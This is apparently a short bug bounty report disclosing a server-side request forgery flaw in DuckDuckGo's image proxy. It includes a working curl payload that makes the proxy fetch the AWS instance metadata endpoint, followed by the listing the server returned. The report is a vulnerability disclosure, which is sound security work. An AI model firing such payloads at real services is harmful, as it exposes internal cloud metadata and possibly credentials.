SSRF vulnerability on proxy.duckduckgo.com (access to metadata server on AWS)

Hello, I saw that SSRF on proxy.duckduckgo.com is out of scope but because of the severity I wanted to report this. The payload is simple: ```curl "https://proxy.duckduckgo.com/iur/?f=1&image_host=http://169.254.169.254/latest/meta-data/"``` Response from the server: ```ami-id ami-launch-index ami-manifest-path block-device-mapping/ hostname instance-action instance-id instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ profile public-hostname public-ipv4 public-keys/ reservation-id security-groups services/``` ## Impact access information on internal AWS metadata server.